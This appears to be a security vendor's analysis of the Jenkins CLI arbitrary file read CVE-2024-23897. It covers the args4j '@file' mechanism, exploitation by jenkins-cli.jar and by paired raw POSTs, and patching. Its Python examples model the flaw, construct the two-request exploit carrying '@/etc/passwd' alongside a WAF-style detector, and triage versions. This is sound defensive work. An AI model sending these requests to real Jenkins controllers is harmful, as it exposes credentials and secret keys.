Vulnerability report written by the TA team: analysis of the "Jenkins Arbitrary File Leak Vulnerability (CVE-2024-23897)"
This vulnerability lies in Jenkins' built-in command line interface (CLI) and its use of the args4j library to parse command arguments. args4j treats an argument of the form @path as a file reference and replaces it with the contents of the named file. Because Jenkins left this feature enabled for CLI commands, an attacker can make the Jenkins controller read files from its own file system and reflect their contents back, putting the confidentiality of sensitive data (configuration, credentials and the keys that protect them) at risk.
Jenkins 2.441 and earlier and LTS 2.426.2 and earlier are affected, so a wide range of installations is exposed. Attackers with Overall/Read permission can read entire files; attackers without it can still read the first few lines of a file, and on controllers where anonymous read access is enabled no authentication is required at all. Internet-exposed Jenkins controllers are common and easy to enumerate with scanning services, which makes this vulnerability especially concerning.
Organizations should therefore quickly identify their Jenkins deployments and take the steps described below to protect them from exploitation.
1. Overview
Jenkins is a popular open source automation server for continuous integration and continuous deployment (CI/CD) pipelines. It gives developers a platform to automate building, testing, and deploying software projects.
Source: https://www.linkedin.com/pulse/you-aware-recent-jenkins-vulnerability-cve-2024-23897-amit-dash-lgi6e
Among the many vulnerabilities reported in Jenkins, this report summarizes our analysis of the recently announced CVE-2024-23897.
2. Attack types
Jenkins ships with a built-in command line interface (CLI) for interacting with the controller from scripts or a shell. When a CLI command is processed on the Jenkins controller, its arguments and options are parsed with the args4j library.
args4j has a usability feature that treats an argument beginning with "@" as a file reference: the argument @/path/to/file is replaced by the lines of that file, each line becoming a separate argument. Jenkins 2.441 and earlier and LTS 2.426.2 and earlier leave this feature enabled for CLI commands and do not restrict it, so the file is opened with the privileges of the controller process and any path on the controller's file system can be named. The expanded lines then flow into ordinary argument validation, and CLI commands that echo an unexpected or unknown argument in their error message (for example "No such command ..." or "Too many arguments: ...") return lines of the file to the caller.
Source: https://hackyboiz.github.io/2024/03/04/ogu123/cve-2024-23897/
The result is an arbitrary file read on the Jenkins controller. Files are decoded with the default character encoding of the controller process, so text files come back faithfully, while binary files (such as the keys used to protect stored credentials) may be partially corrupted. With Overall/Read permission an attacker can retrieve entire files; without it, only the first few lines, which is still enough to expose many sensitive files.
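To make the mechanism concrete, here is a small Python model of args4j's "@file" expansion and of a CLI command whose error message echoes its argument, with the vulnerable and the fixed parser behaviour side by side. This is an added example written for this report, not code from Jenkins or args4j: the names expand_at_files, run_help and leak_via_help, the error strings and the sample file contents are constructed to mirror the behaviour described above and are not taken from either project.

```python
import os
import tempfile
from typing import Iterable, List, Optional


class CmdLineError(Exception):
    """Stand-in for args4j's CmdLineException (hypothetical name)."""


def expand_at_files(args: Iterable[str], at_syntax: bool = True,
                    encoding: Optional[str] = None) -> List[str]:
    """Model of the args4j '@file' expansion step.

    at_syntax=True  : an argument '@/some/path' is replaced by the lines of that
                      file, one argument per line (the behaviour Jenkins 2.441
                      and earlier left enabled for CLI commands).
    at_syntax=False : the argument is passed through untouched (what the fix does).
    The file is decoded with the process default encoding unless one is given,
    as on the controller; undecodable bytes are replaced instead of being fatal.
    """
    expanded: List[str] = []
    for arg in args:
        if at_syntax and arg.startswith("@"):
            path = arg[1:]
            if not os.path.exists(path):
                raise CmdLineError(f"{path} (No such file)")
            with open(path, "r", encoding=encoding, errors="replace") as fh:
                expanded.extend(line.rstrip("\r\n") for line in fh)
        else:
            expanded.append(arg)
    return expanded


def run_help(argv: List[str], known=("help", "version", "who-am-i")) -> str:
    """Toy 'help [COMMAND]': binds at most one positional argument.

    Only the property that matters here is modelled: an unexpected or unknown
    argument is echoed back verbatim in the error text.
    """
    if len(argv) > 1:
        raise CmdLineError(f"Too many arguments: {argv[1]}")
    if argv and argv[0] not in known:
        raise CmdLineError(f"No such command {argv[0]}")
    return "usage: help [COMMAND]"


def leak_via_help(path: str, at_syntax: bool) -> str:
    """Run 'help @<path>' through the parser and return what the caller sees."""
    try:
        return run_help(expand_at_files(["@" + path], at_syntax=at_syntax))
    except CmdLineError as exc:
        return f"ERROR: {exc}"


# Constructed sample content standing in for a sensitive file on the controller.
SAMPLE_LINES = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
]


def write_sample_file() -> str:
    """Write the constructed sample to a temporary file and return its path."""
    fd, path = tempfile.mkstemp(prefix="jenkins-demo-")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write("\n".join(SAMPLE_LINES) + "\n")
    return path


if __name__ == "__main__":
    sample = write_sample_file()
    # Vulnerable parser: the second line of the file comes back in the error.
    print("at-syntax enabled :", leak_via_help(sample, at_syntax=True))
    # Fixed parser: the literal '@/path' is treated as a command name and echoed,
    # but the file is never opened.
    print("at-syntax disabled:", leak_via_help(sample, at_syntax=False))
    os.remove(sample)
```

The first line of the file binds to the command's single positional argument and the second triggers the arity error, which is why a multi-line file leaks through the error message. Commands that accept several arguments, or that validate each one against a server-side list, can disclose more lines the same way. With at_syntax disabled the only thing echoed is the attacker's own literal string.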
There are two ways to exploit this vulnerability.
2-1. Using jenkins-cli.jar
The common approach uses the official jenkins-cli.jar client, which talks to the controller over WebSocket (or SSH). Commands such as help, connect-node, enable-job, and shutdown can be passed an extra argument of the form @/path/to/file; the controller expands it and echoes lines of the file in its error output. The figure below shows the help command being used this way to read a file.
Source: https://www.uptycs.com/blog/jenkins-exploit-cve-2024-23897
The image below shows the contents of a file read from the Jenkins server, returned verbatim.
2-2. Send a POST request
The other method needs no client: two raw HTTP POST requests are sent to http://jenkins/cli?remoting=false. The first, the downloader, carries the header Side: download and keeps a response stream open from which the output of the CLI command is read. The second, the uploader, carries Side: upload and the CLI command (its arguments followed by a start marker) in the request body. The controller pairs the two halves through the same UUID in the Session header of both requests.
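The two-request exchange, together with the check a reverse proxy or WAF would apply to it, as an added example written for this report (it is neither AIWAF's rule set nor Jenkins code). It constructs the downloader and uploader requests, encodes the upload body in the frame layout of Jenkins' plain CLI protocol as the editor reads it (4-byte big-endian payload length, 1-byte opcode, payload; string payloads in DataOutputStream.writeUTF form), then pairs the two requests by their Session UUID and flags any CLI argument that begins with "@". The host name, the session UUID and the request contents are constructed sample data.

```python
import struct
import uuid
from typing import Dict, List, Optional, Tuple

# Opcodes of Jenkins' plain CLI protocol in ordinal order, as the editor reads
# the protocol: ops 0-5 flow client->server, ops 6-8 server->client.
OPS = ["ARG", "LOCALE", "ENCODING", "START", "STDIN", "END_STDIN",
       "EXIT", "STDOUT", "STDERR"]


def java_utf(text: str) -> bytes:
    """DataOutputStream.writeUTF layout: 2-byte big-endian length + UTF-8 bytes
    (Java's modified UTF-8 only differs for NUL and non-BMP characters)."""
    raw = text.encode("utf-8")
    return struct.pack(">H", len(raw)) + raw


def encode_frame(op: str, payload: bytes = b"") -> bytes:
    """One frame: 4-byte payload length, 1-byte opcode, payload."""
    return struct.pack(">IB", len(payload), OPS.index(op)) + payload


def decode_frames(body: bytes) -> List[Tuple[str, bytes]]:
    """Split an upload body into (opcode name, payload) pairs; reject truncation."""
    frames, pos = [], 0
    while pos < len(body):
        if pos + 5 > len(body):
            raise ValueError("truncated frame header")
        length, op = struct.unpack_from(">IB", body, pos)
        pos += 5
        if pos + length > len(body):
            raise ValueError("truncated frame payload")
        name = OPS[op] if op < len(OPS) else f"UNKNOWN_{op}"
        frames.append((name, body[pos:pos + length]))
        pos += length
    return frames


def build_cli_session(args: List[str], session: Optional[str] = None) -> Tuple[bytes, bytes]:
    """The two POSTs a CLI-over-HTTP client sends (constructed sample traffic)."""
    session = session or str(uuid.uuid4())
    common = ("POST /cli?remoting=false HTTP/1.1\r\n"
              "Host: jenkins.example.internal\r\n"      # constructed host name
              f"Session: {session}\r\n")
    download = (common + "Side: download\r\nContent-Length: 0\r\n\r\n").encode()
    body = b"".join(encode_frame("ARG", java_utf(a)) for a in args)
    body += encode_frame("ENCODING", java_utf("UTF-8"))
    body += encode_frame("LOCALE", java_utf("en_US"))
    body += encode_frame("START")   # tells the controller to run the command
    upload = (common + "Side: upload\r\nContent-Type: application/octet-stream\r\n"
              f"Content-Length: {len(body)}\r\n\r\n").encode() + body
    return download, upload


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Minimal HTTP/1.1 request splitter: method, target, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def inspect_requests(requests: List[bytes]) -> List[dict]:
    """Pair /cli POSTs by Session UUID and report sessions whose upload half
    carries an argument starting with '@', the args4j file-expansion trigger."""
    sessions: Dict[str, dict] = {}
    for raw in requests:
        method, target, headers, body = parse_http_request(raw)
        if method != "POST" or not target.split("?", 1)[0].endswith("/cli"):
            continue
        sid = headers.get("session", "")
        entry = sessions.setdefault(sid, {"download": False, "args": [], "at_args": []})
        side = headers.get("side", "")
        if side == "download":
            entry["download"] = True
        elif side == "upload":
            for name, payload in decode_frames(body):
                if name == "ARG":
                    arg = payload[2:].decode("utf-8", "replace")  # skip writeUTF length
                    entry["args"].append(arg)
                    if arg.startswith("@"):
                        entry["at_args"].append(arg)
    return [{"session": sid, **info} for sid, info in sessions.items() if info["at_args"]]


if __name__ == "__main__":
    dl, up = build_cli_session(["help", "@/etc/passwd"])
    for alert in inspect_requests([dl, up]):
        print(alert)
```

Two points for anyone turning this into a production rule: the two halves arrive on separate connections, so the inspector must keep per-UUID state (or simply block the upload half, which is the one that carries the command), and this covers only the HTTP transport. The WebSocket and SSH transports of the CLI carry the same arguments in a different framing and need their own inspection, which is one reason the official guidance is to disable the CLI or update rather than rely on a network filter alone.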
3. What to do
There are generally two ways to respond to the Jenkins Arbitrary File Leak Vulnerability (CVE-2024-23897).
- Disable access to the Jenkins CLI. Jenkins has published a workaround for doing this without restarting the controller, and it is recommended for administrators who cannot update immediately.
- Update to Jenkins 2.442 or LTS 2.426.3 (or later). The fix disables the args4j "@" file-expansion feature in the CLI command parser, which is the feature responsible for the vulnerability.
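A quick way to triage an inventory of controllers is to read the version Jenkins advertises in its X-Jenkins response header and compare it against the first fixed releases, keeping the weekly (X.Y) and LTS (X.Y.Z) lines apart, since a naive comparison would wrongly rank fixed LTS 2.426.3 below vulnerable weekly 2.441. The following is an added example written for this report, not a Jenkins tool; the fixed-version constants come from the advisory summarized above, and the host names and header values are constructed samples.

```python
import re
from typing import Dict, Tuple

# First releases that contain the fix (from the advisory): weekly 2.442, LTS 2.426.3.
FIXED_WEEKLY: Tuple[int, ...] = (2, 442)
FIXED_LTS: Tuple[int, ...] = (2, 426, 3)

_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)(?:\.(\d+))?\s*$")


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.426.2' -> (2, 426, 2); '2.441' -> (2, 441). Anything else is rejected."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognized Jenkins version: {text!r}")
    return tuple(int(p) for p in m.groups() if p is not None)


def is_affected(version: str) -> bool:
    """True when the version predates the fix on its own release line.

    Weekly and LTS numbers are not comparable with each other (LTS 2.426.3 is
    fixed although 426 < 442), so the line is chosen by component count.
    """
    parts = parse_version(version)
    if len(parts) == 3:
        return parts < FIXED_LTS
    return parts < FIXED_WEEKLY


def assess(headers: Dict[str, str]) -> str:
    """Classify a controller from the headers of one captured HTTP response.

    Returns 'affected', 'fixed' or 'unknown' (header absent, for instance when a
    reverse proxy strips it, or value not a plain release number).
    """
    value = next((v for k, v in headers.items() if k.lower() == "x-jenkins"), None)
    if value is None:
        return "unknown"
    try:
        return "affected" if is_affected(value) else "fixed"
    except ValueError:
        return "unknown"


def triage(inventory: Dict[str, Dict[str, str]]) -> Dict[str, str]:
    """Map each host name in the inventory to its assessment."""
    return {host: assess(hdrs) for host, hdrs in inventory.items()}


# Constructed sample: response headers as they would be captured per controller.
SAMPLE_INVENTORY = {
    "ci-old.example.internal": {"X-Jenkins": "2.426.2"},
    "ci-weekly.example.internal": {"X-Jenkins": "2.441"},
    "ci-lts.example.internal": {"x-jenkins": "2.440.1"},
    "ci-proxy.example.internal": {"Server": "nginx"},
}

if __name__ == "__main__":
    for host, verdict in triage(SAMPLE_INVENTORY).items():
        print(f"{host:30} {verdict}")
```

The header can be collected with something like `curl -sI https://<controller>/login`. Treat "unknown" as a controller to inspect by hand, and remember that a "fixed" verdict says nothing about whether the controller was already exploited before the update, or whether the CLI workaround has been applied on an "affected" one.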
Our AIWAF product detects attack syntax exploiting this vulnerability with the pattern "Arbitrary file read in Jenkins".
4. Conclusion
CVE-2024-23897 is a critical vulnerability in Jenkins that underlines the ongoing challenge of securing software automation environments. It lets an attacker abuse CLI argument handling to read arbitrary files from the Jenkins controller. Because the files exposed can include credentials and the keys that protect them, the leak can compromise not only the Jenkins server itself but the broader infrastructure it manages.
The discovery of this vulnerability is a reminder of the importance of diligent security practices in the development and maintenance of automation tools like Jenkins. Organizations using Jenkins for their CI/CD pipelines should prioritize the assessment and remediation of their deployments to protect against potential exploits.
We have developed a number of patterns for Jenkins server-related vulnerabilities in our AIWAF product and will continue to respond quickly to additional Jenkins server-related vulnerabilities as they are discovered.
5. References
- https://www.uptycs.com/blog/jenkins-exploit-cve-2024-23897
- https://ko.securecodewarrior.com/article/deep-dive-up-close-and-personal-with-the-moveit-zero-day-vulnerability
- https://hackyboiz.github.io/2024/03/04/ogu123/cve-2024-23897/
- https://www.enciphers.com/exploiting-cve/in-the-crosshairs-understanding-cve-2024-23897s-technical-implications?491f42f9_page=5&491f4314_page=2&6cf8b8b6_page=5